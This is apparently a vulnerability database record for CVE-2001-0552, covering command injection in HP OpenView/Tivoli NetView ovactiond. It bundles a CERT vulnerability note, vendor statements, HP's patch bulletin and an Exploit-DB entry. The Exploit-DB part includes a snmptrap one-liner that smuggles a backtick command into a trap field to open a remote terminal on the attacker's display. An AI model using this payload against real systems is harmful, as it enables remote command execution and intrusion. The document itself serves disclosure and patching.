ID CVE-2001-0552 Type cve Reporter cve@mitre.org Modified 2016-10-18T02:11:00
Description
ovactiond in HP OpenView Network Node Manager (NNM) 6.1 and Tivoli Netview 5.x and 6.x allows remote attackers to execute arbitrary commands via shell metacharacters in a certain SNMP trap message.
{"cert": [{"lastseen": "2019-05-29T20:45:19", "bulletinFamily": "info", "description": "### Overview \n\nHewlett Packard's (HP) OpenView and Tivoli NetView are system management software packages. There is a vulnerability a component of these packages, ovactiond, that allows intruders to execute arbitrary commands as user bin. This may subsequently lead to a root compromise. \n\n### Description \n\nHP [OpenView](<http://www.openview.hp.com/>) and Tivoli [NetView](<http://www.tivoli.com/products/index/netview/>) are set of tools to manage large networks. Part of OpenView and NetView is a daemon called ovactiond, which is the SNMP trap and event handler. It is possible for an intruder to execute arbitrary commands by sending a malicious message to a vulnerable version of ovactiond. These commands run with the privileges of the ovactiond process, typically bin on Unix systems, and SYSTEM on Windows NT/2000. Often it is possible to use this access to gain root access on Unix systems. An exploit is publicly available. Note that Tivoli NetView is not vulnerable via the default configuration, however, it is likely that customized configurations are vulnerable HP is vulnerable by the default configuration.\n\nFor more information, see HP Security Bulletin HPSBUX0106-154 and <http://www.tivoli.com/support/>. \n \nIt has been confirmed with HP that the patch referenced on Security Focus for OpenView Version 5.01 is only for Version 6.1. \n \n--- \n \n### Impact \n\nAn intruder can execute arbitrary commands with the privileges of the ovactiond process, typically bin on Unix systems, and SYSTEM on Window NT/2000 systems. \n \n--- \n \n### Solution \n\nApply patches from your vendor as appropriate. HP has released HP Security Bulletin HPSBUX0106-154. Tivoli has information posted on <http://www.tivoli.com/support/>. \n \n--- \n \n### Vendor Information\n\n952171\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Vendor has issued information\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n__ Affected __ Unknown __ Unaffected \n\n**Javascript is disabled. Click here to view vendors.**\n\n### __ Compaq Computer Corporation\n\nNotified: June 21, 2001 Updated: August 15, 2001 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nTivoli NetView runs on Compaq Tru64 Unix. Obtain patches for this version from Tivoli\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23952171 Feedback>).\n\n### __ __ Hewlett Packard\n\nNotified: June 15, 2001 Updated: August 24, 2001 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nHP Support Information Digests \n \n=============================================================================== \no IT Resource Center World Wide Web Service \n\\--------------------------------------------------- \n \nIf you subscribed through the IT Resource Center and would \nlike to be REMOVED from this mailing list, access the \nIT Resource Center on the World Wide Web at: \n \n<http://www.itresourcecenter.hp.com/> \n \nLogin using your IT Resource Center User ID and Password. \nThen select Support Information Digests (located under \nMaintenance and Support). You may then unsubscribe from the \nappropriate digest. \n=============================================================================== \n \n \nDigest Name: daily security bulletins digest \nCreated: Fri Aug 24 3:00:02 PDT 2001 \n \nTable of Contents: \n \nDocument ID Title \n\\--------------- ----------- \nHPSBUX0106-154 Sec. Vulnerability in OpenView NNM (rev.1) \n \nThe documents are listed below. \n\\------------------------------------------------------------------------------- \n \n \nDocument ID: HPSBUX0106-154 \nDate Loaded: 20010823 \nTitle: Sec. Vulnerability in OpenView NNM (rev.1) \n \n\\--------------------------------------------------------------- \n**REVISED01**HEWLETT-PACKARD COMPANY SECURITY BULLETIN: #0154, \nOriginally issued: 20 June '01 LAST REVISED: 21 August '01 \n\\--------------------------------------------------------------- \n \nThe information in the following Security Bulletin should be \nacted upon as soon as possible. Hewlett-Packard Company will \nnot be liable for any consequences to any customer resulting \nfrom customer's failure to fully implement instructions in this \nSecurity Bulletin as soon as possible. \n \n\\--------------------------------------------------------------- \n \nPROBLEM: It is possible to gain unauthorized privileges \nin OpenView Network Node Manager. \n \nPLATFORM: HP9000 Servers running HP-UX releases 10.20 and \n11.00 (only). \nSun Microsystems SOLARIS releases 2.X \nMicrosoft Windows NT4.X / Windows 2000 \nrunning NNM 6.1 \n \nDAMAGE: A malicious user may obtain unauthorized privileges under \ncertain conditions. \n \nSOLUTION: Apply one of these patches: \nHP-UX 11.00 HP-UX 10.20 SOLARIS 2.X WinNT4.X/2000 \nPHSS_23780 PHSS_23779 PSOV_02905 NNM_00698 \n**REV 01** \n\\------>> Note: NNM 6.2 is not vulnerable. \n \nAVAILABILITY: These four patches are Special Release patches are \navailable only from \n<http://ovweb.external.hp.com/cpe/patches/> \nThey are not available from the ITRC. \n \nCHANGE SUMMARY: Clarification in Section B below and the SOLUTION \nsection above. \n\\-------------------------------------------------------------------- \nA. Background \nHewlett-Packard Company has been notified of a vulnerability \nin its OpenView Network Node Manager. It is possible to gain \nunauthorized privileges. \n \nB. Fixing the problem \nApply one of these patches: \nHP-UX 11.00 HP-UX 10.20 SOLARIS 2.X WinNT4.X/2000 \nPHSS_23780 PHSS_23779 PSOV_02905 NNM_00698 \n \nor a superseding patch. \nSearching <http://ovweb.external.hp.com/cpe/patches/> for one \nof the patch numbers above will direct you to the latest \nsuperseding patch. \n \n**REV 01** \n\\------>> Although versions of NNM prior to NNM 6.1 are not \n\\------>> vulnerable in their default configuration, it is possible \n\\------>> to modify the default configuration so as to make those \n\\------>> versions vulnerable. Therefore, we recommend that all \n\\------>> customers update to NNM 6.2 or install the appropriate \n\\------>> patches for NNM 6.1. \n\\------>> \n\\------>> The patches listed above have been superseeded. If you \n\\------>> have NNM 6.1 and have installed one of the patches listed \n\\------>> above, no further action is required. The patches listed \n\\------>> above are no longer available. These are the latest patches \n\\------>> that solve the security problem in NNM 6.1: \n\\------>> \n\\------>> HP-UX 11.00 HP-UX 10.20 SOLARIS 2.X WinNT4.X/2000 \n\\------>> PHSS_24443 PHSS_24442 PSOV_02956 NNM_00743 \n\\------>> \n\\------>> Note: one way to determine whether NNM is installed on \n\\------>> your system is to run the following command: \n\\------>> \n\\------>> swlist | grep \"Network Node Manager\" \n \nC. To subscribe to automatically receive future NEW HP Security \nBulletins from the HP IT Resource Center via electronic mail, \ndo the following: \n \nUse your browser to get to the HP IT Resource Center page \nat: \n \n<http://itrc.hp.com> \n \nUse the 'Login' tab at the left side of the screen to login \nusing your ID and password. Use your existing login or the \n\"Register\" button at the left to create a login, in order to \ngain access to many areas of the ITRC. Remember to save the \nUser ID assigned to you, and your password. \n \nIn the left most frame select \"Maintenance and Support\". \n \nUnder the \"Notifications\" section (near the bottom of \nthe page), select \"Support Information Digests\". \n \nTo -subscribe- to future HP Security Bulletins or other \nTechnical Digests, click the check box (in the left column) \nfor the appropriate digest and then click the \"Update \nSubscriptions\" button at the bottom of the page. \n \nor \n \nTo -review- bulletins already released, select the link \n(in the middle column) for the appropriate digest. \n \nTo -gain access- to the Security Patch Matrix, select \nthe link for \"The Security Bulletins Archive\". (near the \nbottom of the page) Once in the archive the third link is \nto the current Security Patch Matrix. Updated daily, this \nmatrix categorizes security patches by platform/OS release, \nand by bulletin topic. Security Patch Check completely \nautomates the process of reviewing the patch matrix for \n11.XX systems. \n \nFor information on the Security Patch Check tool, see: \n<http://www.software.hp.com/cgi-bin/swdepot_parser.cgi/> \ncgi/displayProductInfo.pl?productNumber=B6834AA\" \n \nThe security patch matrix is also available via anonymous ftp: \n \nftp.itrc.hp.com:~ftp/export/patches/hp-ux_patch_matrix \n \nOn the \"Support Information Digest Main\" page: \nclick on the \"HP Security Bulletin Archive\". \n \n \nD. To report new security vulnerabilities, send email to \n \nsecurity-alert@hp.com \n \nPlease encrypt any exploit information using the security-alert \nPGP key, available from your local key server, or by sending a \nmessage with a -subject- (not body) of 'get key' (no quotes) to \nsecurity-alert@hp.com. \n \nPermission is granted for copying and circulating this Bulletin \nto Hewlett-Packard (HP) customers (or the Internet community) \nfor the purpose of alerting them to problems, if and only if, \nthe Bulletin is not edited or changed in any way, is attributed \nto HP, and provided such reproduction and/or distribution is \nperformed for non-commercial purposes. \n \nAny other use of this information is prohibited. HP is not \nliable for any misuse of this information by any third party. \n____________________________________________________________________ \n\\-----End of Document ID: HPSBUX0106-154--------------------------------------\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23952171 Feedback>).\n\n### __ IBM\n\nNotified: June 21, 2001 Updated: August 15, 2001 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nTivoli NetView runs on IBM AIX. Obtain patches for this version from Tivoli.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23952171 Feedback>).\n\n### __ __ Microsoft\n\nNotified: June 15, 2001 Updated: August 15, 2001 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nNNM is a third-party application as far as our platform is concerned. We don't have any special relationship with it. HP would need to provide the patches.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nHP OpenView and Tivoli NetView run on Microsoft Windows. Obtain patches for this version from HP and Tivoli.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23952171 Feedback>).\n\n### __ Sun\n\nNotified: June 15, 2001 Updated: August 15, 2001 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nHP OpenView and Tivoli NetView run on Solaris. Obtain patches for this version from HP and Tivoli.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23952171 Feedback>).\n\n### __ __ Tivoli\n\nNotified: June 27, 2001 Updated: August 15, 2001 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nTivoli acknowledges that certain user customizations to Tivoli NetView may lead to a potential security exposure. Please reference <http://www.tivoli.com/support/> for further information and to obtain an e-fix which addresses the issue.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nWe have discussed this problem with Tivoli, and they report to us that they are vulnerable. \n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23952171 Feedback>).\n\n### __ __ Apple\n\nNotified: June 21, 2001 Updated: August 15, 2001 \n\n### Status\n\n__ Not Vulnerable\n\n### Vendor Statement\n\nMac OS X and Mac OS X Server do not have this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23952171 Feedback>).\n\n### __ __ Computer Associates\n\nNotified: August 07, 2001 Updated: August 15, 2001 \n\n### Status\n\n__ Not Vulnerable\n\n### Vendor Statement\n\nComputer Associates has completed a review of all Unicenter functions and processing related to SNMP traps as indicated by the advisory. Unicenter is not subject to the same vulnerabilities as demonstrated by the SNMP trap managers identified by CERT (i.e., OpenView and NetView). CA Unicenter does not formulate commands determined through trap data parsing. Unicenter implements this technology using different methods and thereby avoids this exposure. Computer Associates maintains strong relationships with these vendors and recommends that clients running any environments containing either of these products visit the website URLs specifically identified by the CERT Coordination Center.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23952171 Feedback>).\n\n### __ __ FreeBSD\n\nNotified: June 21, 2001 Updated: August 15, 2001 \n\n### Status\n\n__ Not Vulnerable\n\n### Vendor Statement\n\nFreeBSD does not use this code.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23952171 Feedback>).\n\n### __ __ Fujitsu\n\nNotified: June 21, 2001 Updated: August 15, 2001 \n\n### Status\n\n__ Not Vulnerable\n\n### Vendor Statement\n\nRegarding VU#952171, Fujitsu's UXP/V operating system is not affected because there's no implementation of any OpenView Technology in UXP/V.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23952171 Feedback>).\n\n### __ BSDI\n\nNotified: June 21, 2001 Updated: August 15, 2001 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23952171 Feedback>).\n\n### __ Caldera\n\nNotified: June 21, 2001 Updated: August 15, 2001 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23952171 Feedback>).\n\n### __ Debian\n\nNotified: June 21, 2001 Updated: August 15, 2001 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23952171 Feedback>).\n\n### __ Dg\n\nNotified: June 21, 2001 Updated: August 15, 2001 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23952171 Feedback>).\n\n### __ NEC\n\nNotified: June 21, 2001 Updated: August 15, 2001 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23952171 Feedback>).\n\n### __ NeXT\n\nNotified: June 21, 2001 Updated: August 15, 2001 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23952171 Feedback>).\n\n### __ NetBSD\n\nNotified: June 21, 2001 Updated: August 15, 2001 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23952171 Feedback>).\n\n### __ OpenBSD\n\nNotified: June 21, 2001 Updated: August 15, 2001 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23952171 Feedback>).\n\n### __ RedHat\n\nNotified: June 21, 2001 Updated: August 15, 2001 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23952171 Feedback>).\n\n### __ SCO\n\nNotified: June 21, 2001 Updated: August 15, 2001 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23952171 Feedback>).\n\n### __ SGI\n\nNotified: June 21, 2001 Updated: August 15, 2001 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23952171 Feedback>).\n\n### __ Sequent\n\nNotified: June 21, 2001 Updated: August 15, 2001 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23952171 Feedback>).\n\n### __ Siemens Nixdorf\n\nNotified: June 21, 2001 Updated: August 15, 2001 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23952171 Feedback>).\n\n### __ Sony\n\nNotified: June 21, 2001 Updated: August 15, 2001 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23952171 Feedback>).\n\n### __ Unisys\n\nNotified: June 21, 2001 Updated: August 15, 2001 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23952171 Feedback>).\n\nView all 25 vendors __View less vendors __\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | N/A | N/A \nTemporal | N/A | N/A \nEnvironmental | | N/A \n \n \n\n\n### References \n\n * <http://us-support.external.hp.com/cki/bin/doc.pl/screen=ckiDisplayDocument?docId=200000055277985>\n * <http://www.tivoli.com/support/>\n * <http://www.securityfocus.com/bid/2845>\n\n### Acknowledgements\n\nOur thanks to Milo G. van der Zee, who reported this problem to us and to Hewlett-Packard for the information contained in their advisory. \n\nThis document was written by Jason Rafail. \n\n### Other Information\n\n**CVE IDs:** | [CVE-2001-0552](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-0552>) \n---|--- \n**CERT Advisory:** | [CA-2001-24 ](<http://www.cert.org/advisories/CA-2001-24.html>) \n**Severity Metric:****** | 44.89 \n**Date Public:** | 2001-06-08 \n**Date First Published:** | 2001-06-21 \n**Date Last Updated: ** | 2001-09-06 15:57 UTC \n**Document Revision: ** | 18 \n", "modified": "2001-09-06T15:57:00", "published": "2001-06-21T00:00:00", "id": "VU:952171", "href": "https://www.kb.cert.org/vuls/id/952171", "type": "cert", "title": "Hewlett Packard OpenView and Tivoli NetView do not adequately validate SNMP trap arguments", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2016-02-02T15:15:55", "bulletinFamily": "exploit", "description": "IBM Tivoli NetView 5/6 OVActionD SNMPNotify Command Execution Vulnerability. CVE-2001-0552. Remote exploits for multiple platform", "modified": "2001-06-08T00:00:00", "published": "2001-06-08T00:00:00", "id": "EDB-ID:20909", "href": "https://www.exploit-db.com/exploits/20909/", "type": "exploitdb", "title": "IBM Tivoli NetView 5/6 OVActionD SNMPNotify Command Execution Vulnerability", "sourceData": "source: http://www.securityfocus.com/bid/2845/info\r\n\r\novactiond is part of the system management software packages OpenView and Netview, distributed by HP and IBM. It is designed for use on enterprise systems, and offers remote administrative facilities.\r\n\r\nA problem with the software makes it possible for a remote user to execute commands on a managed system with the privileges of the ovactiond process (often 'bin' on Unix systems). The default configuration of the daemon as installed with HP OpenView enables the execution of commands upon receiving a trap with the command encapsulated in quotes and escapes. Tivoli Netview is not vulnerable to this by default, but may be if customized.\r\n\r\nsnmptrap -v 1 <NNM host> .1.3.6.1.4.1.11.2.17.1 1.2.3.4 6 60000208 0 1 s \"\" 2 s \"\" 3 s \"\\`/usr/bin/X11/hpterm -display <your client display>\\`\" 4 s \"\" [snip...] 12 s \"\" ", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/20909/"}], "osvdb": [{"lastseen": "2017-04-28T13:20:06", "bulletinFamily": "software", "description": "# No description provided by the source\n\n## References:\nKeyword: Network Node Manager\nISS X-Force ID: 6683\n[CVE-2001-0552](https://vulners.com/cve/CVE-2001-0552)\nCERT VU: 952171\nCERT: CA-2001-24\nBugtraq ID: 2845\n", "modified": "2001-06-08T00:00:00", "published": "2001-06-08T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:11341", "id": "OSVDB:11341", "title": "HP OpenView NNM/Tivoli NetView ovactiond Arbitrary Command Execution", "type": "osvdb", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}
